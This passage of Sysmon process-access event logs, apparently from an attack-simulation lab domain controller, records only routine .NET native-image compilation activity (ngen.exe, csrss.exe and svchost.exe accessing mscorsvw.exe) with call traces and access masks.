\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7427,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.918\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-0010E4480B00}\r\nTargetProcessId: 2984\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.918","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-0010E4480B00}","TargetProcessId":"2984","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7428,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.933\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-0010E4480B00}\r\nTargetProcessId: 2984\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.933","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-0010E4480B00}","TargetProcessId":"2984","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7429,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.965\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-0010024C0B00}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.965","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-0010024C0B00}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7430,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.965\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-0010024C0B00}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.965","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-0010024C0B00}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7431,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.965\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-0010024C0B00}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.965","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-0010024C0B00}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7432,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:54.121\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1326-5F25-0000-0010AF4F0B00}\r\nTargetProcessId: 2960\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:54.121","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1326-5F25-0000-0010AF4F0B00}","TargetProcessId":"2960","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7433,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:54.121\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1326-5F25-0000-0010AF4F0B00}\r\nTargetProcessId: 2960\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:54.121","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1326-5F25-0000-0010AF4F0B00}","TargetProcessId":"2960","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7434,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:54.136\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1326-5F25-0000-0010AF4F0B00}\r\nTargetProcessId: 2960\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:54.136","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1326-5F25-0000-0010AF4F0B00}","TargetProcessId":"2960","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
